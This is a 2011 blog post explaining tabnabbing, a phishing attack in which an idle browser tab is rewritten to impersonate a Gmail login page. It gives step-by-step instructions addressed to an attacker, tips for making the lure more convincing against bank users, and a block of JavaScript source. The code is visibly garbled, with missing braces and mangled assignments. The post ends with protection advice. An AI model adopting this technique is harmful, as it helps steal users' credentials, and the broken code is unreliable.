Monday, April 18, 2011


  • What is Tabnabbing ?

Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular Web sites by impersonating those sites and convincing the user that the site is genuine. The attack's name was coined in early 2010 by Aza Raskin, a security researcher and design expert.

  • How Tabnabbing Works ?

1. A user navigates to your normal looking site.

2. You detect when the page has lost its focus and hasn’t been interacted with for a while.

3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.

4. As the user scans their many open tabs, the favicon and title act as a strong visual cue - memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.

5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.

You can make this attack even more effective by changing the copy: Instead of having just a login screen, you can mention that the session has timed out and the user needs to re-authenticate. This happens often on bank websites, which makes them even more susceptible to this kind of attack.

  • Source Code:

var TIMER = null;
var HAS_SWITCHED = false;

window.onblur = function(){
TIMER = setTimeout(changeItUp, 5000);

window.onfocus = function(){
if(TIMER) clearTimeout(TIMER);

function setTitle(text){ document.title = text; }

favicon = {
docHead: document.getElementsByTagName("head")[0],
set: function(url){

addLink: function(iconURL) {
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = iconURL;

removeLinkIfExists: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {

get: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
return link.href;

function createShield(){
div = document.createElement("div"); = "fixed"; = 0; = 0; = "white"; = "100%"; = "100%"; = "center"; = "hidden";

img = document.createElement("img"); = "15px";
img.src = "";

var oldTitle = document.title;
var oldFavicon = favicon.get() || "/favicon.ico";

img.onclick = function(){
div.parentNode.removeChild(div); = "auto";


function changeItUp(){
if( HAS_SWITCHED == false ){
setTitle( "Gmail: Email from Google");


  • Protection:

1. Keep your web browser up-to-date. Also make sure that plugins and extensions are up-to-date and from trusted sources.

2. The NoScript extension for Firefox defends both from the JavaScript-based and from the scriptless attack, based on meta refresh, by preventing inactive tabs from changing the location of the page.

3. Pay attention to the address in your browser’s toolbar, especially when it comes to login pages. It’s easy to get into muscle-memory mode and just assume that a tab is unchanged, but for important user accounts, keep an eye on that location bar.

4. Consider using some sort of password management tool. Raskin points to the Firefox Account Manager as one method of using the browser for your identity manager, but plugins and tools like 1Password are good choices too. Rather than typing in user names and passwords individually, using an identity manager that compares the site you are on against the stored data in its database (making sure the addresses and DNS addresses matchup) will prevent you from entering in information into a false site.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

No comments:

Post a Comment

If you like this post, comment please...